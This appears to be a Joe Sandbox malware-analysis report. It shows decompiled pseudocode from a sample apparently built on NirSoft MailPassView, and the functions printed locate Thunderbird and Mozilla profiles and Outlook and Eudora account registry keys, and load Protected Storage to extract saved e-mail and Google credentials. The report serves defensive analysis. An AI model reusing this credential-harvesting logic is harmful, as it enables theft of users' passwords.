                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                                                                    • String ID: rA
                                                                                                                                                    • API String ID: 379999529-474049127
                                                                                                                                                    • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                                                                                    • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                                                                                                                    • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                                                                                    • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401E8B Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                    			E00401E8B(void* __eflags, char* _a4) {
				signed int _v8;
				int _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void _v1059;
				char _v1060;
				void _v1323;
				char _v1324;
				void _v2347;
				char _v2348;
				void* __edi;
				void* __esi;
				int _t65;
				char* _t69;
				char _t70;
				int _t71;
				char _t75;
				void* _t76;
				long _t78;
				void* _t83;
				int _t85;
				void* _t87;
				int _t104;
				int _t108;
				char _t126;
				void* _t137;
				void* _t139;
				char* _t157;
				char* _t158;
				char* _t160;
				int _t161;
				void* _t164;
				CHAR* _t169;
				char* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_v540 = 0;
				memset( &_v539, 0, 0x104);
				_t164 = 0x1a;
				E0040EE59( &_v540, _t164); // executed
				_t65 = strlen("Mozilla\\Profiles");
				_t6 = strlen( &_v540) + 1; // 0x1
				_t172 = _t171 + 0x14;
				if(_t65 + _t6 >= 0x104) {
					_t69 = _a4;
					 *_t69 = 0;
					_t157 = _t69;
				} else {
					_t157 = _a4;
					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
				}
				_t70 = E0040614B(_t157);
				if(_t70 == 0) {
					 *_t157 = _t70;
				}
				_t158 = _t157 + 0x105;
				_t71 = strlen("Thunderbird\\Profiles");
				_t12 = strlen( &_v540) + 1; // 0x1
				if(_t71 + _t12 >= 0x104) {
					 *_t158 = 0;
				} else {
					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
				}
				_t75 = E0040614B(_t158);
				_pop(_t137);
				if(_t75 == 0) {
					 *_t158 = _t75;
				}
				_t160 = _a4 + 0x20a;
				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
				_t173 = _t172 + 0xc;
				if(_t76 == 0) {
					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
					_t173 = _t173 + 0xc;
					if(_t126 == 0) {
						 *_t160 = _t126;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
				_t174 = _t173 + 0xc;
				if(_t78 != 0) {
					L32:
					_t169 = _a4 + 0x30f;
					if( *_t169 != 0) {
						L35:
						return _t78;
					}
					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
					_t78 = E0040614B(_t169);
					if(_t78 != 0) {
						goto L35;
					}
					 *_t169 = _t78;
					return _t78;
				} else {
					_v796 = _t78;
					_t161 = 0;
					memset( &_v795, 0, 0xff);
					_v12 = 0;
					_t83 = E0040EC05(_v8, 0,  &_v796);
					_t175 = _t174 + 0x18;
					if(_t83 != 0) {
						L31:
						_t78 = RegCloseKey(_v8);
						goto L32;
					}
					_t170 = "sqlite3.dll";
					do {
						_t85 = atoi( &_v796);
						_pop(_t139);
						if(_t85 < 3) {
							goto L28;
						}
						_v2348 = 0;
						memset( &_v2347, _t161, 0x3ff);
						_v276 = 0;
						memset( &_v275, _t161, 0x104);
						sprintf( &_v2348, "%s\\Main",  &_v796);
						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
						_t175 = _t175 + 0x38;
						if(_v276 != 0 && E0040614B( &_v276) != 0) {
							_v1060 = 0;
							memset( &_v1059, _t161, 0x104);
							_v1324 = 0;
							memset( &_v1323, _t161, 0x104);
							_t104 = strlen(_t170);
							_t41 = strlen( &_v276) + 1; // 0x1
							_t175 = _t175 + 0x20;
							if(_t104 + _t41 >= 0x104) {
								_v1060 = 0;
							} else {
								E004062AD( &_v1060,  &_v276, _t170);
							}
							_t108 = strlen("nss3.dll");
							_t47 = strlen( &_v276) + 1; // 0x1
							if(_t108 + _t47 >= 0x104) {
								_v1324 = 0;
							} else {
								E004062AD( &_v1324,  &_v276, "nss3.dll");
							}
							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
								_t161 = 0;
								goto L28;
							} else {
								strcpy(_a4 + 0x30f,  &_v276);
								goto L31;
							}
						}
						L28:
						_v12 = _v12 + 1;
						_t87 = E0040EC05(_v8, _v12,  &_v796);
						_t175 = _t175 + 0xc;
					} while (_t87 == 0);
					goto L31;
				}
			}














































                                                                                                                                                    0x00401ea6
                                                                                                                                                    0x00401ead
                                                                                                                                                    0x00401eb4
                                                                                                                                                    0x00401ebb
                                                                                                                                                    0x00401ec6
                                                                                                                                                    0x00401ed9
                                                                                                                                                    0x00401edd
                                                                                                                                                    0x00401ee2
                                                                                                                                                    0x00401efa
                                                                                                                                                    0x00401efd
                                                                                                                                                    0x00401f00
                                                                                                                                                    0x00401ee4
                                                                                                                                                    0x00401ee4
                                                                                                                                                    0x00401ef1
                                                                                                                                                    0x00401ef7
                                                                                                                                                    0x00401f03
                                                                                                                                                    0x00401f0b
                                                                                                                                                    0x00401f0d
                                                                                                                                                    0x00401f0d
                                                                                                                                                    0x00401f14
                                                                                                                                                    0x00401f1a
                                                                                                                                                    0x00401f2d
                                                                                                                                                    0x00401f35
                                                                                                                                                    0x00401f4e
                                                                                                                                                    0x00401f37
                                                                                                                                                    0x00401f45
                                                                                                                                                    0x00401f4b
                                                                                                                                                    0x00401f52
                                                                                                                                                    0x00401f59
                                                                                                                                                    0x00401f5a
                                                                                                                                                    0x00401f5c
                                                                                                                                                    0x00401f5c
                                                                                                                                                    0x00401f6b
                                                                                                                                                    0x00401f76
                                                                                                                                                    0x00401f7b
                                                                                                                                                    0x00401f85
                                                                                                                                                    0x00401f92
                                                                                                                                                    0x00401f97
                                                                                                                                                    0x00401f9c
                                                                                                                                                    0x00401f9e
                                                                                                                                                    0x00401f9e
                                                                                                                                                    0x00401f9c
                                                                                                                                                    0x00401fa0
                                                                                                                                                    0x00401fae
                                                                                                                                                    0x00401fb3
                                                                                                                                                    0x00401fb8
                                                                                                                                                    0x004021a9
                                                                                                                                                    0x004021ac
                                                                                                                                                    0x004021b5
                                                                                                                                                    0x004021d5
                                                                                                                                                    0x004021d5
                                                                                                                                                    0x004021d5
                                                                                                                                                    0x004021be
                                                                                                                                                    0x004021c5
                                                                                                                                                    0x004021cd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004021cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401fbe
                                                                                                                                                    0x00401fc3
                                                                                                                                                    0x00401fc9
                                                                                                                                                    0x00401fd3
                                                                                                                                                    0x00401fe3
                                                                                                                                                    0x00401fe6
                                                                                                                                                    0x00401feb
                                                                                                                                                    0x00401ff0
                                                                                                                                                    0x004021a0
                                                                                                                                                    0x004021a3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004021a3
                                                                                                                                                    0x00401ff6
                                                                                                                                                    0x00401ffb
                                                                                                                                                    0x00402002
                                                                                                                                                    0x0040200a
                                                                                                                                                    0x0040200b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040201e
                                                                                                                                                    0x00402025
                                                                                                                                                    0x00402033
                                                                                                                                                    0x0040203a
                                                                                                                                                    0x00402052
                                                                                                                                                    0x0040206e
                                                                                                                                                    0x00402073
                                                                                                                                                    0x0040207d
                                                                                                                                                    0x004020a1
                                                                                                                                                    0x004020a8
                                                                                                                                                    0x004020b6
                                                                                                                                                    0x004020bd
                                                                                                                                                    0x004020c3
                                                                                                                                                    0x004020d6
                                                                                                                                                    0x004020da
                                                                                                                                                    0x004020df
                                                                                                                                                    0x004020f8
                                                                                                                                                    0x004020e1
                                                                                                                                                    0x004020ef
                                                                                                                                                    0x004020f5
                                                                                                                                                    0x00402104
                                                                                                                                                    0x00402117
                                                                                                                                                    0x0040211f
                                                                                                                                                    0x0040213c
                                                                                                                                                    0x00402121
                                                                                                                                                    0x00402133
                                                                                                                                                    0x00402139
                                                                                                                                                    0x00402152
                                                                                                                                                    0x00402165
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402189
                                                                                                                                                    0x00402199
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040219f
                                                                                                                                                    0x00402152
                                                                                                                                                    0x00402167
                                                                                                                                                    0x00402167
                                                                                                                                                    0x00402177
                                                                                                                                                    0x0040217c
                                                                                                                                                    0x0040217f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402187

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00401EAD
                                                                                                                                                    • strlen.MSVCRT ref: 00401EC6
                                                                                                                                                    • strlen.MSVCRT ref: 00401ED4
                                                                                                                                                    • strlen.MSVCRT ref: 00401F1A
                                                                                                                                                    • strlen.MSVCRT ref: 00401F28
                                                                                                                                                    • memset.MSVCRT ref: 00401FD3
                                                                                                                                                    • atoi.MSVCRT ref: 00402002
                                                                                                                                                    • memset.MSVCRT ref: 00402025
                                                                                                                                                    • sprintf.MSVCRT ref: 00402052
                                                                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                                                                    • memset.MSVCRT ref: 004020A8
                                                                                                                                                    • memset.MSVCRT ref: 004020BD
                                                                                                                                                    • strlen.MSVCRT ref: 004020C3
                                                                                                                                                    • strlen.MSVCRT ref: 004020D1
                                                                                                                                                    • strlen.MSVCRT ref: 00402104
                                                                                                                                                    • strlen.MSVCRT ref: 00402112
                                                                                                                                                    • memset.MSVCRT ref: 0040203A
                                                                                                                                                      • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                                                                      • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                                                                                    • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                                                                                                                      • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                    • API String ID: 2492260235-4223776976
                                                                                                                                                    • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                                                                                    • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                                                                                                                    • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                                                                                    • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B9AD Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 168COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                    			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v304;
				signed int _v308;
				struct HWND__* _v312;
				intOrPtr _v604;
				struct HACCEL__* _v620;
				struct HWND__* _v644;
				char _v900;
				char _v904;
				char _v908;
				struct tagMSG _v936;
				intOrPtr _v940;
				struct HWND__* _v944;
				struct HWND__* _v948;
				char _v956;
				char _v980;
				char _v988;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t49;
				void* _t52;
				int _t56;
				int _t58;
				int _t68;
				void* _t72;
				int _t75;
				int _t77;
				struct HWND__* _t78;
				int _t80;
				int _t85;
				int _t86;
				struct HWND__* _t100;

				 *0x416b94 = _a4;
				_t49 = E00404837(__ecx);
				if(_t49 != 0) {
					E0040EDAC();
					_t52 = E00406A2C( &_v980);
					_t100 = 0;
					_v940 = 0x20;
					_v948 = 0;
					_v936.hwnd = 0;
					_v944 = 0;
					_v936.message = 0;
					E0040B785(_t52,  &_v900);
					_v8 =  &_v980;
					E00406C87(__eflags,  &_v980, _a12);
					_t56 = E00406DFB(_v16, "/savelangfile");
					__eflags = _t56;
					if(_t56 < 0) {
						E0040823D(); // executed
						_t58 = E00406DFB(_v8, "/deleteregkey");
						__eflags = _t58;
						if(_t58 < 0) {
							 *0x417110 = 0x11223344; // executed
							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
							__eflags =  *0x417110 - 0x1c233487;
							if( *0x417110 == 0x1c233487) {
								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
								if(__eflags <= 0) {
									L13:
									__imp__CoInitialize(_t100);
									E0040B70A( &_v908);
									__eflags = _v604 - 3;
									if(_v604 != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow(_v644, ??);
									UpdateWindow(_v644);
									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
									E0040AD9D( &_v908);
									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
									__eflags = _t68;
									if(_t68 == 0) {
										L24:
										__imp__CoUninitialize();
										goto L25;
									} else {
										do {
											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
											__eflags = _t75;
											if(_t75 != 0) {
												goto L23;
											}
											_t78 =  *0x4171ac;
											__eflags = _t78 - _t100;
											if(_t78 == _t100) {
												L21:
												_t80 = IsDialogMessageA(_v644,  &_v936);
												__eflags = _t80;
												if(_t80 == 0) {
													TranslateMessage( &_v936);
													DispatchMessageA( &_v936);
												}
												goto L23;
											}
											_t85 = IsDialogMessageA(_t78,  &_v936);
											__eflags = _t85;
											if(_t85 != 0) {
												goto L23;
											}
											goto L21;
											L23:
											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
											__eflags = _t77;
										} while (_t77 != 0);
										goto L24;
									}
								}
								_t86 = E0040B8D7( &_v904, __eflags);
								__eflags = _t86;
								if(_t86 == 0) {
									_t100 = 0;
									__eflags = 0;
									goto L13;
								}
								_push(_v28);
								_v904 = 0x41356c;
								L004115D6();
								__eflags = _v304;
								if(_v304 != 0) {
									DeleteObject(_v304);
									_v308 = _v308 & 0x00000000;
								}
								goto L27;
							}
							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
							goto L25;
						}
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
						goto L25;
					} else {
						 *0x417488 = 0x416b28;
						E0040836E();
						L25:
						_push(_v32);
						_v908 = 0x41356c;
						L004115D6();
						__eflags = _v308 - _t100;
						if(_v308 != _t100) {
							DeleteObject(_v308);
							_v312 = _t100;
						}
						L27:
						_v908 = 0x412474;
						E00406A4E( &_v988);
						E0040462E( &_v956);
						E00406A4E( &_v988);
						_t72 = 0;
						__eflags = 0;
						goto L28;
					}
				} else {
					_t72 = _t49 + 1;
					L28:
					return _t72;
				}
			}








































                                                                                                                                                    0x0040b9bf
                                                                                                                                                    0x0040b9c4
                                                                                                                                                    0x0040b9cb
                                                                                                                                                    0x0040b9d3
                                                                                                                                                    0x0040b9dc
                                                                                                                                                    0x0040b9e1
                                                                                                                                                    0x0040b9e7
                                                                                                                                                    0x0040b9ef
                                                                                                                                                    0x0040b9f3
                                                                                                                                                    0x0040b9f7
                                                                                                                                                    0x0040b9fb
                                                                                                                                                    0x0040b9ff
                                                                                                                                                    0x0040ba0c
                                                                                                                                                    0x0040ba13
                                                                                                                                                    0x0040ba24
                                                                                                                                                    0x0040ba29
                                                                                                                                                    0x0040ba2b
                                                                                                                                                    0x0040ba41
                                                                                                                                                    0x0040ba52
                                                                                                                                                    0x0040ba57
                                                                                                                                                    0x0040ba59
                                                                                                                                                    0x0040ba7c
                                                                                                                                                    0x0040ba86
                                                                                                                                                    0x0040ba8c
                                                                                                                                                    0x0040ba96
                                                                                                                                                    0x0040bab7
                                                                                                                                                    0x0040babb
                                                                                                                                                    0x0040bb09
                                                                                                                                                    0x0040bb0a
                                                                                                                                                    0x0040bb14
                                                                                                                                                    0x0040bb19
                                                                                                                                                    0x0040bb21
                                                                                                                                                    0x0040bb27
                                                                                                                                                    0x0040bb23
                                                                                                                                                    0x0040bb23
                                                                                                                                                    0x0040bb23
                                                                                                                                                    0x0040bb30
                                                                                                                                                    0x0040bb3d
                                                                                                                                                    0x0040bb51
                                                                                                                                                    0x0040bb5c
                                                                                                                                                    0x0040bb6f
                                                                                                                                                    0x0040bb71
                                                                                                                                                    0x0040bb73
                                                                                                                                                    0x0040bbe3
                                                                                                                                                    0x0040bbe3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040bb75
                                                                                                                                                    0x0040bb7b
                                                                                                                                                    0x0040bb8e
                                                                                                                                                    0x0040bb94
                                                                                                                                                    0x0040bb96
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040bb98
                                                                                                                                                    0x0040bb9d
                                                                                                                                                    0x0040bb9f
                                                                                                                                                    0x0040bbad
                                                                                                                                                    0x0040bbb9
                                                                                                                                                    0x0040bbbb
                                                                                                                                                    0x0040bbbd
                                                                                                                                                    0x0040bbc4
                                                                                                                                                    0x0040bbcf
                                                                                                                                                    0x0040bbcf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040bbbd
                                                                                                                                                    0x0040bba7
                                                                                                                                                    0x0040bba9
                                                                                                                                                    0x0040bbab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040bbd5
                                                                                                                                                    0x0040bbdd
                                                                                                                                                    0x0040bbdf
                                                                                                                                                    0x0040bbdf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040bb7b
                                                                                                                                                    0x0040bb73
                                                                                                                                                    0x0040bac1
                                                                                                                                                    0x0040bac6
                                                                                                                                                    0x0040bac8
                                                                                                                                                    0x0040bb07
                                                                                                                                                    0x0040bb07
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040bb07
                                                                                                                                                    0x0040baca
                                                                                                                                                    0x0040bad1
                                                                                                                                                    0x0040bad9
                                                                                                                                                    0x0040bade
                                                                                                                                                    0x0040bae7
                                                                                                                                                    0x0040baf4
                                                                                                                                                    0x0040bafa
                                                                                                                                                    0x0040bafa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040bae7
                                                                                                                                                    0x0040baa5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040baa5
                                                                                                                                                    0x0040ba65
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040ba2d
                                                                                                                                                    0x0040ba2d
                                                                                                                                                    0x0040ba37
                                                                                                                                                    0x0040bbe9
                                                                                                                                                    0x0040bbe9
                                                                                                                                                    0x0040bbf0
                                                                                                                                                    0x0040bbf8
                                                                                                                                                    0x0040bbfd
                                                                                                                                                    0x0040bc05
                                                                                                                                                    0x0040bc0e
                                                                                                                                                    0x0040bc14
                                                                                                                                                    0x0040bc14
                                                                                                                                                    0x0040bc1b
                                                                                                                                                    0x0040bc1f
                                                                                                                                                    0x0040bc27
                                                                                                                                                    0x0040bc30
                                                                                                                                                    0x0040bc39
                                                                                                                                                    0x0040bc3e
                                                                                                                                                    0x0040bc3e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040bc3e
                                                                                                                                                    0x0040b9cd
                                                                                                                                                    0x0040b9cd
                                                                                                                                                    0x0040bc40
                                                                                                                                                    0x0040bc46
                                                                                                                                                    0x0040bc46

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,75144DE0,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 00404856
                                                                                                                                                      • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                                                                                      • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040487C
                                                                                                                                                      • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040BC0E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                                                                                                                    • API String ID: 745651260-414181363
                                                                                                                                                    • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                                                                                    • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                                                                                                                    • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                                                                                    • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403C3D Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 170librarystringloaderCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                    			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
				char _v8;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t38;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t60;
				char* _t73;
				void* _t76;
				_Unknown_base(*)()* _t86;
				void* _t87;
				void* _t89;
				signed int _t98;
				char* _t106;
				_Unknown_base(*)()* _t120;
				void* _t131;

				_t131 = __fp0;
				_t91 = __ecx;
				_push(__ecx);
				_t98 = __ecx;
				_t89 = __ecx + 0x87c;
				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
				E0040E894(_t89);
				_t38 = LoadLibraryA("pstorec.dll"); // executed
				 *(_t89 + 8) = _t38;
				if(_t38 == 0) {
					L4:
					E0040E894(_t89);
				} else {
					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
					_t120 = _t86;
					_t91 = 0 | _t120 != 0x00000000;
					 *(_t89 + 0x10) = _t86;
					if(_t120 != 0) {
						goto L4;
					} else {
						_t91 = _t89 + 4;
						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
						_t122 = _t87;
						if(_t87 != 0) {
							goto L4;
						} else {
							 *(_t89 + 0xc) = 1;
						}
					}
				}
				E004047A0(_t98 + 0x890, _t122);
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
				_push(_t98 + 0x858); // executed
				E0040754D(_t91, _t122); // executed
				E0040719C(_t91, _t98 + 0x86c); // executed
				E0040765B(_t122, _t98 + 0x878); // executed
				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
				_t123 = _t52;
				if(_t52 == 0) {
					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
				}
				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
				_t124 = _t54;
				if(_t54 == 0) {
					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
				}
				E00402C44(_t91, _t131, _t98); // executed
				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
				_t56 = E00406278();
				_push( &_v8);
				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
				} else {
					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
				}
				_push(0x80000001);
				_t58 = E0040EB3F();
				_t126 = _t58;
				if(_t58 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t126, _t131, _t98);
				}
				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
				_t127 = _t60;
				if(_t60 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t127, _t131, _t98);
				}
				E0040E8AB(_t89);
				E004047F1(_t98 + 0x890);
				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
				E0040329E(_t131, _t98);
				E004034CB(_t91, _t127, _t131, _t98); // executed
				E0040396C(_t127, _t131, _t98); // executed
				E004037B1(_t91, _t98, _t131, _t98); // executed
				_t73 = _t98 + 0xb20;
				_t128 =  *_t73;
				if( *_t73 != 0) {
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
				}
				_t106 = _t98 + 0xc25;
				_t129 =  *_t106;
				if( *_t106 != 0) {
					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
				}
				_push(_t98 + 0x640); // executed
				E0040D9F9(_t129); // executed
				E0040D865(_t98 + 0x640);
				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
				return _t76;
			}





















                                                                                                                                                    0x00403c3d
                                                                                                                                                    0x00403c3d
                                                                                                                                                    0x00403c40
                                                                                                                                                    0x00403c44
                                                                                                                                                    0x00403c46
                                                                                                                                                    0x00403c4c
                                                                                                                                                    0x00403c52
                                                                                                                                                    0x00403c5c
                                                                                                                                                    0x00403c66
                                                                                                                                                    0x00403c69
                                                                                                                                                    0x00403c9b
                                                                                                                                                    0x00403c9d
                                                                                                                                                    0x00403c6b
                                                                                                                                                    0x00403c71
                                                                                                                                                    0x00403c79
                                                                                                                                                    0x00403c7b
                                                                                                                                                    0x00403c7e
                                                                                                                                                    0x00403c83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403c85
                                                                                                                                                    0x00403c88
                                                                                                                                                    0x00403c8c
                                                                                                                                                    0x00403c8e
                                                                                                                                                    0x00403c90
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403c92
                                                                                                                                                    0x00403c92
                                                                                                                                                    0x00403c92
                                                                                                                                                    0x00403c90
                                                                                                                                                    0x00403c83
                                                                                                                                                    0x00403ca8
                                                                                                                                                    0x00403cb2
                                                                                                                                                    0x00403cbc
